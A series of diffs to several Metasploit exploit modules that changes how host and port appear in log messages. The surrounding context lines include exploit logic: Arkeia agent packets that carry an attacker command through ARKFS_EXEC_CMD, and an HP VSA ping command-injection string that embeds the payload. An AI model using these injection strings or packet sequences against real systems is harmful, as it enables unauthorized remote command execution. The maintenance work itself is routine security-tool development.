     end
 
     data_length = data_length.unpack('n')[0]
@@ -386,7 +386,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = sock.get_once(data_length)
     unless data && data.length == data_length
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet data")
     end
 
     req = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32"
@@ -396,14 +396,14 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
@@ -411,7 +411,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = sock.get_once(data_length)
     unless data && data.length == data_length
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet data")
     end
 
     req = "\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00"
@@ -424,21 +424,21 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
 
     unless data_length == 0
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Unexpected length read")
     end
 
     req = "\x00\x62\x00\x01\x00\x02\x00\x1b"
@@ -451,21 +451,21 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
 
     unless data_length == 0
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Unexpected length read")
     end
 
     req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
@@ -481,21 +481,21 @@ class MetasploitModule < Msf::Exploit::Remote
     req << command # Our command to be executed
     req << "\x00"
 
-    print_status("#{rhost}:#{rport} - Executing payload through ARKFS_EXEC_CMD")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Executing payload through ARKFS_EXEC_CMD")
 
     sock.put(req)
 
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
@@ -503,7 +503,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = sock.get_once(data_length)
     unless data && data.length == data_length
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet data")
     end
 
     # 1st Packet
@@ -511,14 +511,14 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
@@ -526,7 +526,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = sock.get_once(data_length)
     unless data && data.length == data_length
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet data")
     end
 
     # 2st Packet
@@ -534,14 +534,14 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
@@ -549,7 +549,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = sock.get_once(data_length)
     unless data && data.length == data_length
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet data")
     end
   end
 

--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -305,14 +305,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if data =~ /VERSION.*WD Arkeia ([0-9]+\.[0-9]+\.[0-9]+)/
       version = $1
-      vprint_status("#{rex::socket.to_authority(rhost, rport)} - Arkeia version detected: #{version}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Arkeia version detected: #{version}")
       if Rex::Version.new(version) <= Rex::Version.new('11.0.12')
         return Exploit::CheckCode::Appears("Arkeia version #{version} is vulnerable")
       else
         return Exploit::CheckCode::Safe("Arkeia version #{version} is not vulnerable")
       end
     else
-      vprint_status("#{rex::socket.to_authority(rhost, rport)} - Arkeia version not detected")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Arkeia version not detected")
       return Exploit::CheckCode::Unknown('Could not determine the version')
     end
   end
@@ -346,11 +346,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def communicate(command)
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Connecting to Arkeia daemon")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Connecting to Arkeia daemon")
 
     connect
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Sending agent communication")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending agent communication")
 
     req = "\x00\x41\x00\x00\x00\x00\x00\x70"
     req << "\x00" * 12
@@ -371,14 +371,14 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
@@ -386,7 +386,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = sock.get_once(data_length)
     unless data && data.length == data_length
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet data")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet data")
     end
 
     req = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32"
@@ -396,14 +396,14 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
@@ -411,7 +411,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = sock.get_once(data_length)
     unless data && data.length == data_length
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet data")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet data")
     end
 
     req = "\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00"
@@ -424,21 +424,21 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
 
     unless data_length == 0
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Unexpected length read")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Unexpected length read")
     end
 
     req = "\x00\x62\x00\x01\x00\x02\x00\x1b"
@@ -451,21 +451,21 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
 
     unless data_length == 0
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Unexpected length read")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Unexpected length read")
     end
 
     req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
@@ -481,21 +481,21 @@ class MetasploitModule < Msf::Exploit::Remote
     req << command # Our command to be executed
     req << "\x00"
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Executing payload through ARKFS_EXEC_CMD")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Executing payload through ARKFS_EXEC_CMD")
 
     sock.put(req)
 
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
@@ -503,7 +503,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = sock.get_once(data_length)
     unless data && data.length == data_length
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet data")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet data")
     end
 
     # 1st Packet
@@ -511,14 +511,14 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
@@ -526,7 +526,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = sock.get_once(data_length)
     unless data && data.length == data_length
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet data")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet data")
     end
 
     # 2st Packet
@@ -534,14 +534,14 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet length")
     end
 
     data_length = data_length.unpack('n')[0]
@@ -549,7 +549,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = sock.get_once(data_length)
     unless data && data.length == data_length
       disconnect
-      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet data")
+      fail_with(Failure::Unknown, "#{Rex::Socket.to_authority(rhost, rport)} - Failure reading packet data")
     end
   end
 

--- a/modules/exploits/multi/misc/hp_vsa_exec.rb
+++ b/modules/exploits/multi/misc/hp_vsa_exec.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Login at 8.5.0
     packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
-    print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} Sending login packet for version 8.5.0")
     sock.put(packet)
     res = sock.get_once
     vprint_status(Rex::Text.to_hex_dump(res)) if res
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Login at 9.0.0
     packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")
-    print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} Sending login packet for version 9.0.0")
     sock.put(packet)
     res = sock.get_once
     vprint_status(Rex::Text.to_hex_dump(res)) if res
@@ -112,10 +112,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if target.name =~ /Automatic/
       my_target = get_target
-      print_good("#{rhost}:#{rport} - Target #{my_target.name} found")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Target #{my_target.name} found")
     else
       my_target = target
-      print_status("#{rhost}:#{rport} Sending login packet")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Sending login packet")
       packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")
       sock.put(packet)
       res = sock.get_once
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Command execution
-    print_status("#{rhost}:#{rport} Sending injection")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} Sending injection")
     data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
     data << "64/5/" if my_target.name =~ /9/
     packet = generate_packet(data)

--- a/modules/exploits/multi/misc/jboss_remoting_unified_invoker_rce.rb
+++ b/modules/exploits/multi/misc/jboss_remoting_unified_invoker_rce.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return Exploit::CheckCode::Safe('Target did not respond with expected Java serialization handshake')
   rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError => e
-    print_error("Error to connect #{rhost}:#{rport} : '#{e.class}' '#{e}'")
+    print_error("Error to connect #{rex::socket.to_authority(rhost, rport)} : '#{e.class}' '#{e}'")
     return Exploit::CheckCode::Unknown('Connection error')
   end
 

--- a/modules/exploits/multi/misc/jboss_remoting_unified_invoker_rce.rb
+++ b/modules/exploits/multi/misc/jboss_remoting_unified_invoker_rce.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return Exploit::CheckCode::Safe('Target did not respond with expected Java serialization handshake')
   rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError => e
-    print_error("Error to connect #{rex::socket.to_authority(rhost, rport)} : '#{e.class}' '#{e}'")
+    print_error("Error to connect #{Rex::Socket.to_authority(rhost, rport)} : '#{e.class}' '#{e}'")
     return Exploit::CheckCode::Unknown('Connection error')
   end
 

--- a/modules/exploits/multi/misc/legend_bot_exec.rb
+++ b/modules/exploits/multi/misc/legend_bot_exec.rb
@@ -77,13 +77,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return Exploit::CheckCode::Unknown('Connection to the IRC server not allowed')
     end
 
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return Exploit::CheckCode::Unknown('Connection failed')
     end
 
@@ -152,21 +152,21 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect
 
-    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      print_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      print_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Exploiting the malicious IRC bot...")
     legend_command(sock)
 
     quit(sock)

--- a/modules/exploits/multi/misc/legend_bot_exec.rb
+++ b/modules/exploits/multi/misc/legend_bot_exec.rb
@@ -77,13 +77,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return Exploit::CheckCode::Unknown('Connection to the IRC server not allowed')
     end
 
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return Exploit::CheckCode::Unknown('Connection failed')
     end
 
@@ -152,21 +152,21 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      print_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return
     end
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      print_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return
     end
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Exploiting the malicious IRC bot...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Exploiting the malicious IRC bot...")
     legend_command(sock)
 
     quit(sock)

--- a/modules/exploits/multi/misc/osgi_console_exec.rb
+++ b/modules/exploits/multi/misc/osgi_console_exec.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
       execute_cmdstager({ flavor: :bourne })
     end
 
-    print_status("#{rhost}:#{rport} - Waiting for session...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for session...")
 
     (datastore['TIME_WAIT']).times do
       Rex.sleep(1)

--- a/modules/exploits/multi/misc/pbot_exec.rb
+++ b/modules/exploits/multi/misc/pbot_exec.rb
@@ -78,13 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     response = register(sock)
     if response =~ /463/ or response =~ /464/
-      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return Exploit::CheckCode::Unknown('Connection to the IRC server not allowed')
     end
 
     response = join(sock)
     if not response =~ /353/ and not response =~ /366/
-      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return Exploit::CheckCode::Unknown('Connection failed')
     end
     response = pbot_login(sock)
@@ -164,28 +164,28 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
     response = register(sock)
     if response =~ /463/ or response =~ /464/
-      print_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return
     end
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
     response = join(sock)
     if not response =~ /353/ and not response =~ /366/
-      print_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return
     end
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the pbot...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Registering with the pbot...")
     response = pbot_login(sock)
     if not response =~ /auth/ or not response =~ /logged in/
-      print_error("#{rex::socket.to_authority(rhost, rport)} - Error registering with the pbot")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Error registering with the pbot")
       return
     end
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Exploiting the pbot...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Exploiting the pbot...")
     pbot_command(sock)
 
     quit(sock)

--- a/modules/exploits/multi/misc/pbot_exec.rb
+++ b/modules/exploits/multi/misc/pbot_exec.rb
@@ -78,13 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     response = register(sock)
     if response =~ /463/ or response =~ /464/
-      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return Exploit::CheckCode::Unknown('Connection to the IRC server not allowed')
     end
 
     response = join(sock)
     if not response =~ /353/ and not response =~ /366/
-      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return Exploit::CheckCode::Unknown('Connection failed')
     end
     response = pbot_login(sock)
@@ -164,28 +164,28 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect
 
-    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
     response = register(sock)
     if response =~ /463/ or response =~ /464/
-      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      print_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
     response = join(sock)
     if not response =~ /353/ and not response =~ /366/
-      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      print_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Registering with the pbot...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the pbot...")
     response = pbot_login(sock)
     if not response =~ /auth/ or not response =~ /logged in/
-      print_error("#{rhost}:#{rport} - Error registering with the pbot")
+      print_error("#{rex::socket.to_authority(rhost, rport)} - Error registering with the pbot")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Exploiting the pbot...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Exploiting the pbot...")
     pbot_command(sock)
 
     quit(sock)

--- a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb
+++ b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def connect_irc
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Connecting to IRC server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Connecting to IRC server...")
     connect
 
     data = ''
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if data and data =~ /020.*wait/
-      print_good("#{rex::socket.to_authority(rhost, rport)} - Connection successful, giving 3 seconds to IRC server to process our connection...")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Connection successful, giving 3 seconds to IRC server to process our connection...")
       select(nil, nil, nil, 3)
     end
   end
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     response = register(sock)
     if response =~ /463/ or response =~ /464/
-      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
